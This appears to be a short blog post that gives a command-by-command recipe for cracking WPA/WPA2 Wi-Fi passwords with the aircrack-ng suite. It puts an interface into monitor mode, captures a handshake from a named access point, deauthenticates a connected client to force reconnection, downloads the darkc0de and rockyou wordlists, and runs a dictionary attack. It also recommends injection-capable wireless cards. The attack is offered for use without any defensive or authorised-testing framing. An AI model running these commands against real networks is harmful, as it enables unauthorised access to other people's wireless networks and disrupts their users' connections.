Terminal Commands for WPA/WPA2 wireless cracking:
airmon-ng airmon-ng start wlan0 airodump-ng mon0
Press Ctrl+Z to break out of ‘airodump-ng’ after you collect the wireless access point’s BSSID and CH #.
airmon-ng stop mon0 airmon-ng start wlan0 10 airodump-ng -c 10 --bssid 00:11:50:61:18:72 -w wpadeauth-01.cap mon0
Wait and collect the WPA/WPA2 handshake when a device with the known key connects to the wireless network. Or if someone is already on the network you can “sends disassocate packets to one or more clients which are currently associated with a particular access point.”[1]
aireplay-ng aireplay-ng -0 3 -a 00:11:50:61:18:72 -c 58:55:CA:96:EE:84 mon0
Now that you have the WPA/WPA2 handshake, let’s crack it!
wget http://www.alexrams.com/blog/wp-content/uploads/2014/09/darkc0de.lst.gz gunzip darkc0de.lst.gz aircrack-ng -w darkc0de.lst -b 00:11:50:61:18:72 wpadeauth-01.cap
wget http://www.alexrams.com/blog/wp-content/uploads/2014/09/rockyou.7z 7z x rockyou.7z
Recommended cards for wireless injection with BackTrack and/or Kali:
- Alfa AWUS036H (Highly recommended and has better range)
- Alfa AWUS036NHA (Also great, less range but faster wifi connection)
[1] http://www.aircrack-ng.org/doku.php?id=deauthentication
[*] darkc0de.lst.gz
[*] rockyou.7z